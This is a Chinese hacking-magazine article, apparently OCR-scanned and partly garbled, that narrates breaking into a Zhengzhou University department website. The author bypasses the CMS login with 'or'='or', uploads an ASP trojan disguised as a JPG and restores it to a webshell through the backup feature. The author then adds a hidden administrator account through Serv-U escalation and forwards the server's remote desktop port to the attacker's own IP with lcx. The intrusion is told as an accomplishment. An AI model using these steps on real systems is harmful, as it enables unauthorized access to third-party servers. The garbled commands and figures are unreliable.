如发现有乱码， 请直接从这里浏览原文
正文摘录:

记一次绕过证书认证的入侵在源码站下载了一套“易天工作室通用企业型后台管理系统”的源代码来进行研究，结果在check.asp页面中发现了一个问题：由于程序没有对输入内容进行过滤，使得我们可以输入万能密码登录，而直接进入后台(难道这个就是传说中的企业后台漏洞)。既然发现了这套程序的漏洞，那我们当然要利用此漏洞来拿服务器了。Googlehacking(也就是利用google搜索使用这套系统的网站了)了一下，来到了郑州大学某院系的页面，直接在uRL后面加上admin，后台一下就跳出来了。让我们看看漏洞是否存在吧。在用户名和密码处都填’or’=’or’，然后把验证码写好，点登录，果然进入了管理页面，说明漏洞真的存在。因为这套程序本身就有备份的功能，所以得到webshell就很简单了。先把我们的AsP木马改成JPG格式上传，如RAIN试着连接了一下，没有成功，可能有防火墙或者是内网的原因。服务器还开了21和43958端口，看来安装有serv—u，那就使用木马中自带的这个提权脚本来试试。执行riotusercoolSlove.／add&netlu~algroupedmiriistr’ator‘coolS／add，执行后看了下“系统用户用户帐号”这项，果然多了个cool$用户，如图5。居然这么简单就提权成功了，好久没有遇到这样的好事了。图5终端连接不上可难不倒我。上传了一个1cx.exe，在服务器卜使用wscript.shell执行E：＼www4roct＼work＼mpa＼edmin＼Icx。exe—slave‘121.20.172.12851127.图1。在空间图片管理的最后1页或2页就可以看到我O-O.164‘125，如图6。rII)mllIE.、聊…。刚‘…。。j塑堕羔I兰劁图6该命令的意思是把服务器上的64l26端口转丑l21.20.172.126(我自己电脑的公网Ip地址)的5】社广I船E茁卉赤±n妯j；I……I：。—.‘'E^^n┗┻┛图2然后在图片木马上单击右键，选择属性，就可以得到上传后的文件路径了，在数据库备份里把我们的图片木马还原成AsP格式就可以了(在备份的时候，如果路径填写错误会提示网页无法显示，如果出现这样的情况，可以检查下图片的路径是否填写正确。此套程序中也有ewebed.tor，如果后台中备份的功能被删除了，可以试试使用这个来拿websheli，因为很多管理员都忘记更改它的默认密码或数据库路径)。登录我们备份出的webshell，看了下服务器的信息，wscript.shell组件没有删除，如图3，而终端端口则被改成了64126.如图4。图3图4意思是把51端口上的数据转发到500O端口，连接本机的5000端口就相当于连接服务器的64126端口了(小编注：一般是先在本地监听，然后再执行转发操作，这样可以防止数据丢失而导致数据转发失败)，如果没有特殊情况就可以看到终端登录的窗口了。可是令我感到意外的是，本机接收到的数据出现了错误，图7每次刚刚和服务器建立连接后，马上就出现数据读取错误，就是连接不上。奇怪了，以前在渗透别的网站时，服务器没有更改默认端口，使用Jcx.把端口转出来就不会出错，为什么把端口改了之后就会出现